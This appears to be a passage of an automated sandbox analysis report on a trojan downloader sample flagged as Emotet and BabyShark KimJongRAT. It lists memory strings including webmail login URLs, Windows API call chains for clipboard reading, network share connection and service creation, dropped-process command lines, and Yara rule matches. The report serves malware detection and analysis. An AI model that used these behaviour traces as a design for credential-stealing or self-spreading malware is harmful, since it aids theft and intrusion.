                    Source: WinRtTracing.exe, WinRtTracing.exe, 00000006.00000002.1326742844.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: WinRtTracing.exeString found in binary or memory: https://login.yahoo.com/config/login
                    Source: svchost.exe, 00000012.00000003.1539811350.000001B98FD6F000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.1539617617.000001B98FD5C000.00000004.00000001.sdmp, svchost.exe, 00000012.00000003.1539603419.000001B98FD4B000.00000004.00000001.sdmpString found in binary or memory: https://picsart.com/privacy-policy?hl=en
                    Source: svchost.exe, 00000012.00000002.1543945475.000001B98F4EC000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                    Source: WinRtTracing.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_00401131 SendMessageA,GetKeyState,GetKeyState,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,CloseClipboard,0_2_00401131
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_00401131 SendMessageA,GetKeyState,GetKeyState,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,CloseClipboard,0_2_00401131
                    Source: WinRtTracing.exe, 00000001.00000002.1543844951.000000000086A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_0044082C GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_0044082C
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_004528D7 GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,0_2_004528D7
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_004528EC GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,0_2_004528EC
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_0043CDD3 GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_0043CDD3

                    E-Banking Fraud:

                    barindex
                    Emotet Banking Trojan foundShow sources
                    Source: unknownProcess created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\23AF.tmp'
                    Source: unknownProcess created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\2575.tmp'
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\23AF.tmp'Jump to behavior
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeProcess created: C:\Windows\SysWOW64\webservices\WinRtTracing.exe 'C:\Windows\SysWOW64\webservices\WinRtTracing.exe' /scomma 'C:\Users\user\AppData\Local\Temp\2575.tmp'Jump to behavior
                    Yara detected EmotetShow sources
                    Source: Yara matchFile source: 00000000.00000002.1279031602.0000000000580000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1543674898.0000000000671000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1547549347.0000000003400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1547978728.0000000003660000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1317424943.00000000026FA000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1547685679.00000000035B0000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1317378021.00000000026D8000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1320801058.000000000270B000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1322236899.0000000002759000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1323629032.00000000038F8000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1279042884.0000000000591000.00000020.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1543614308.0000000000660000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1317331922.00000000026B4000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 1.2.WinRtTracing.exe.35b0000.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.WinRtTracing.exe.3660000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.WinRtTracing.exe.3400000.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.WinRtTracing.exe.35b0000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.WinRtTracing.exe.3400000.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.WinRtTracing.exe.3660000.5.raw.unpack, type: UNPACKEDPE

                    System Summary:

                    barindex
                    Malicious sample detected (through community Yara rule)Show sources
                    Source: 00000006.00000002.1326742844.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                    Source: 00000001.00000003.1329105049.0000000003580000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                    Source: 1.3.WinRtTracing.exe.3580000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                    Source: 6.2.WinRtTracing.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                    Source: 6.2.WinRtTracing.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects BabyShark KimJongRAT Author: Florian Roth
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification,5_2_0040A5A9
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_1_0040A5A9 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,FindCloseChangeNotification,_wcsicmp,FindCloseChangeNotification,5_1_0040A5A9
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E948D6BC SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,7_2_00007FF6E948D6BC
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E9461AE4 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,7_2_00007FF6E9461AE4
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E94695A8 NtQueryInformationToken,NtQueryInformationToken,7_2_00007FF6E94695A8
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E9469560 NtQueryInformationToken,7_2_00007FF6E9469560
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E94694B0 NtOpenThreadToken,NtOpenProcessToken,NtClose,7_2_00007FF6E94694B0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E9488510 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,7_2_00007FF6E9488510
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E94650E4 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,7_2_00007FF6E94650E4
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E9461BDC NtQueryVolumeInformationFile,GetFileInformationByHandleEx,7_2_00007FF6E9461BDC
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E9476440: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPEAX@Z,memset,??_V@YAXPEAX@Z,FindClose,??_V@YAXPEAX@Z,7_2_00007FF6E9476440
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E946B404 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,7_2_00007FF6E946B404
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeFile created: C:\Windows\SysWOW64\webservices\Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeFile deleted: C:\Windows\SysWOW64\webservices\WinRtTracing.exe:Zone.IdentifierJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_0041A0B60_2_0041A0B6
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_004102C60_2_004102C6
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_004104A30_2_004104A3
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_0042A5900_2_0042A590
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_0043F5130_2_0043F513
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: 0_2_00421A1F0_2_00421A1F
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 1_3_03584F581_3_03584F58
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 1_3_03584E561_3_03584E56
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 1_3_03584EC71_3_03584EC7
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 1_3_03584DE51_3_03584DE5
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 3_2_004038A53_2_004038A5
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 3_2_004094703_2_00409470
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 3_2_004010B43_2_004010B4
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 3_2_0040C0BC3_2_0040C0BC
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 3_2_004099E23_2_004099E2
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 3_2_0040B1F73_2_0040B1F7
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 3_2_0040123E3_2_0040123E
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 3_2_004083253_2_00408325
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_004360CE5_2_004360CE
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_0040509C5_2_0040509C
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_004051995_2_00405199
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_0043C2D05_2_0043C2D0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_004404065_2_00440406
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_0040451D5_2_0040451D
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_004045FF5_2_004045FF
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_0040458E5_2_0040458E
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_004046905_2_00404690
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_00414A515_2_00414A51
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_00404C085_2_00404C08
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_00406C8E5_2_00406C8E
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_00415DF35_2_00415DF3
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_00416E5C5_2_00416E5C
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_00410FE45_2_00410FE4
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_1_004360CE5_1_004360CE
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_1_0040509C5_1_0040509C
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_1_004051995_1_00405199
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_1_0043C2D05_1_0043C2D0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_1_004404065_1_00440406
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_1_0040451D5_1_0040451D
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_1_004045FF5_1_004045FF
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_1_0040458E5_1_0040458E
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_1_004046905_1_00404690
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_1_00414A515_1_00414A51
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_1_00404C085_1_00404C08
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_1_00406C8E5_1_00406C8E
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_1_00415DF35_1_00415DF3
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_1_00416E5C5_1_00416E5C
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_1_00410FE45_1_00410FE4
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 6_2_00404DE56_2_00404DE5
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 6_2_00404E566_2_00404E56
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 6_2_00404EC76_2_00404EC7
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 6_2_00404F586_2_00404F58
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 6_2_0040BF6B6_2_0040BF6B
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 6_1_00404DE56_1_00404DE5
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 6_1_00404E566_1_00404E56
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 6_1_00404EC76_1_00404EC7
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 6_1_00404F586_1_00404F58
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 6_1_0040BF6B6_1_0040BF6B
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00000001400041587_2_0000000140004158
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_000000014000D4047_2_000000014000D404
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_000000014000C4187_2_000000014000C418
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_000000014000CC587_2_000000014000CC58
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_000000014000C0687_2_000000014000C068
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00000001400012847_2_0000000140001284
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00000001400098B87_2_00000001400098B8
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00000001400010D87_2_00000001400010D8
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_000000014000B7607_2_000000014000B760
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_0000000140004BB07_2_0000000140004BB0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E946AA8C7_2_00007FF6E946AA8C
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E9475AA87_2_00007FF6E9475AA8
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E94716987_2_00007FF6E9471698
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E9473A747_2_00007FF6E9473A74
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E946A3287_2_00007FF6E946A328
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E948D6BC7_2_00007FF6E948D6BC
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E94626C07_2_00007FF6E94626C0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E94652C07_2_00007FF6E94652C0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E94621787_2_00007FF6E9462178
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E9464D487_2_00007FF6E9464D48
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E9470D607_2_00007FF6E9470D60
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E94871F87_2_00007FF6E94871F8
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E94752287_2_00007FF6E9475228
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E9472DC47_2_00007FF6E9472DC4
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E946CC907_2_00007FF6E946CC90
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E9474C7C7_2_00007FF6E9474C7C
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E94730847_2_00007FF6E9473084
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E9467CB07_2_00007FF6E9467CB0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E9462CA07_2_00007FF6E9462CA0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E9461C547_2_00007FF6E9461C54
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E94764407_2_00007FF6E9476440
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E946B1107_2_00007FF6E946B110
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E948452C7_2_00007FF6E948452C
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E94709207_2_00007FF6E9470920
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E9486CC07_2_00007FF6E9486CC0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E946A4E07_2_00007FF6E946A4E0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E9462F807_2_00007FF6E9462F80
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E94887447_2_00007FF6E9488744
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E94690107_2_00007FF6E9469010
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E946B4047_2_00007FF6E946B404
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E946D7C07_2_00007FF6E946D7C0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E9487BC07_2_00007FF6E9487BC0
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracingoe.exeCode function: 7_2_00007FF6E9489FE87_2_00007FF6E9489FE8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: String function: 004134C8 appears 277 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: String function: 00412B98 appears 48 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeCode function: String function: 00455D09 appears 38 times
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: String function: 00445190 appears 72 times
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: String function: 00416849 appears 132 times
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: String function: 00412360 appears 36 times
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: String function: 00444C5E appears 36 times
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: String function: 0040924D appears 62 times
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: String function: 00444C70 appears 40 times
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: String function: 00412084 appears 39 times
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: String function: 0042FF22 appears 32 times
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: String function: 004166E8 appears 68 times
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: String function: 00416A91 appears 176 times
                    Source: SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: WinRtTracingoe.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: WinRtTracingoe.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: WinRtTracingoe.exe.1.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe, 00000000.00000002.1278990874.0000000000493000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameCHexEditDemo.EXER vs SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe
                    Source: SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe, 00000000.00000002.1280187503.0000000002F00000.00000002.00000001.sdmpBinary or memory string: originalfilename vs SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe
                    Source: SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe, 00000000.00000002.1280187503.0000000002F00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe
                    Source: SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe, 00000000.00000002.1279445979.0000000002470000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe
                    Source: SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exeBinary or memory string: OriginalFilenameCHexEditDemo.EXER vs SecuriteInfo.com.Trojan.DownLoader34.9370.19760.exe
                    Source: 00000006.00000002.1326742844.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                    Source: 00000001.00000003.1329105049.0000000003580000.00000040.00000001.sdmp, type: MEMORYMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                    Source: 1.3.WinRtTracing.exe.3580000.5.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                    Source: 6.2.WinRtTracing.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                    Source: 6.2.WinRtTracing.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
                    Source: classification engineClassification label: mal100.phis.bank.troj.spyw.evad.winEXE@16/2@0/4
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_004183B8 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,5_2_004183B8
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_00418842 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,5_2_00418842
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: _snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,WaitForSingleObject,_snwprintf,memset,WNetAddConnection2W,GetProcessHeap,HeapFree,GetTickCount,_snwprintf,_snwprintf,_snwprintf,CopyFileW,OpenSCManagerW,CreateServiceW,StartServiceW,CloseServiceHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,1_3_035B2E40
                    Source: C:\Windows\SysWOW64\webservices\WinRtTracing.exeCode function: 5_2_00413C19 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,FindCloseChangeNotification,free,Process32NextW,FindCloseChangeNotification,5_2_00413C19
